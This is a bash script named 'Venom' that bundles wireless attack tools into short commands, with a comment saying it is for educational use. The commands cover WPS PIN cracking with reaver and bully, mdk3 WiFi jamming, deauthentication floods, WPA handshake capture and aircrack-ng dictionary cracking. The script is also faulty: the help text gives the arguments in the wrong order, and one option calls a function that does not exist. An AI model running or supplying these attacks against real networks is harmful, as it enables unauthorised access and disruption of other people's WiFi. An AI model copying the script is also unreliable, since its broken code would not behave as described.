#!/bin/bash
#A tool to help begining hackers
#Do not use for illegal purposes! White hat hacking or
#goverment use! This is for educational purposes only!
# v 3.1 2020 release

function port_scan () {
    echo "Starting port scan on port $1"
    sudo nmap -v -A $1
    echo "Done!"
}

function monitor_mode () {
    echo "Putting $1 into monitor mode"
    sudo airmon-ng start $1
    echo "Done!"
}

function managed_mode () {
    echo "Putting $1 into managed mode"
    sudo airmon-ng stop $1
    echo "Done!"
}

function ping_scan () {
    echo "Pinging $1"
    ping $1
    echo "Done!"
}

function check_interfaces () {
    echo "Checking interfaces"
    iwconfig
    echo "Done!"
}

function reaver_func () {
    echo "Executing reaver attack on interface $1 with bssid $2"
    sudo reaver -i $1 --bssid $2 -vvv
    echo "Done!"
}

function bully_func () {
    echo "Executing bully attack on interface $1 with bssid $2"
    sudo bully -b $2 $1
    echo "Done!"
}

function reaver_wipixie () {
    echo "Executing reaver attack on interface $1 with bssid $2 using pixiewps"
    sudo reaver -i $1 -b $2 -K -vv
    echo "Done!"
}

function bully_wipixie () {
    echo "Executing bully attack on interface $1 with bssid $2 using pixiewps"
    sudo bully -b $2 -d $1
    echo "Done!"
}

function mdk3_func () {
    echo "Executing mdk3 WiFi Jamming on interface $1 on channel $2"
    sudo mdk3 $1 d -c $2
    echo "Done!"
}

function handshake_func () {
    echo "Performing handshake with bssid $1 on interface $2 on channel $3"
    sudo airodump-ng -c $3 --bssid $1 -w capture $2
    echo "Saved in .cap file capture"
    echo "Done!"
}

function cap_crack () {
    echo "Cracking .cap file $1 with dictionary $2"
    sudo aircrack-ng $1 -w $2
    echo "Done!"
}

function dauth_attack () {
    echo "Performing deauth attack on bssid $1 on interface $2"
    sudo aireplay-ng -0 10 -a $1 $2
    echo "Done!"
}

function print_tools () {
    echo "Tools used by Venom 3"
    echo "nmap | sudo apt-get install nmap"
    echo "bully | sudo apt-get install bully"
    echo "aircrack-ng | sudo apt-get install aircrack-ng"
    echo "pixiewps | sudo apt-get install pixiewps"
    echo "reaver | sudo apt-get install reaver"
    echo "mdk3 | sudo apt-get install mdk3"
    echo "Type 'venom inst <tool_name>' to install tool"
}

function install_tool () {
    echo "Installing tool $1"
    if [[ "$1" == "nmap" ]]
    then
        sudo apt-get install nmap
        echo "Done!"
    elif [[ "$1" == "bully" ]]
    then
        sudo apt-get install bully
        echo "Done!"
    elif [[ "$1" == "aircrack-ng" ]]
    then
        sudo apt-get install aircrack-ng
        echo "Done!"
    elif [[ "$1" == "pixiewps" ]]
    then
        sudo apt-get install pixiewps
        echo "Done!"
    elif [[ "$1" == "reaver" ]]
    then
        sudo apt-get install reaver
        echo "Done!"
    elif [[ "$1" == "mdk3" ]]
    then
        sudo apt-get install mdk3
        echo "Done!"
    else
        echo "Please enter a valid tool name"
    fi
}

function main () {
    echo "Venom v 3.1 - New and Improved!"
    echo "p - port scan | venom p <port name>"
    echo "imon - put interface into monitor mode | venom imon <interface>"
    echo "iman - put interface into managed mode | venom iman <interface>"
    echo "pi - ping scan | venom pi <ip>"
    echo "i - check interfaces | venom i"
    echo "r - reaver Wpa-Wpa2 Password Cracker | venom r <bssid> <interface>"
    echo "b - bully Wpa-Wpa2 Password Cracker | venom b <bssid> <interface>"
    echo "rp - reaver Wpa-Wpa2 Password Cracker with pixiewps | venom rp <bssid> <interface>"
    echo "bp - bully Wpa-Wpa2 Password Cracker with pixiewps | venom bp <bssid> <interface>"
    echo "mj - mdk3 WiFi Jammer | venom mj <channel> <interface>"
    echo "hsh - Perform a wpsk handshake | venom hsh <bssid> <interface> <channel>"
    echo "dauth - Perform a deauth attack | venom dauth <bssid> <interface>"
    echo "cc - .cap file cracker | venom cc <file name> <dictionary>"
    echo "h - displays help screen"
    echo ""
    echo "type 'venom t' to see a list of tool names"

}

if [ -z "$1" ]
then
    main
elif [[ "$1" == "p" ]]
then
    #echo $2
    port_scan $2
elif [[ "$1" == "imon" ]]
then
    monitor_mode $2
elif [[ "$1" == "iman" ]]
then
    managed_mode $2
elif [[ "$1" == "pi" ]]
then
    ping_func $2
elif [[ "$1" == "i" ]]
then
    check_interfaces
elif [[ "$1" == "r" ]]
then
    reaver_func $2 $3
elif [[ "$1" == "b" ]]
then
    bully_func $2 $3
elif [[ "$1" == "rp" ]]
then
    reaver_wipixie $2 $3
elif [[ "$1" == "bp" ]]
then
    bully_wipixie $2 $3
elif [[ "$1" == "mj" ]]
then
    mdk3_func $2 $3
elif [[ "$1" == "t" ]]
then
    print_tools
elif [[ "$1" == "h" ]]
then
    main
elif [[ "$1" == "inst" ]]
then
    install_tool $2
elif [[ "$1" == "hsh" ]]
then
    handshake_func $2 $3 $4
elif [[ "$1" == "cc" ]]
then
    cap_crack $2 $3
elif [[ "$1" == "dauth" ]]
then
    dauth_attack $2 $3
else
    main
fi
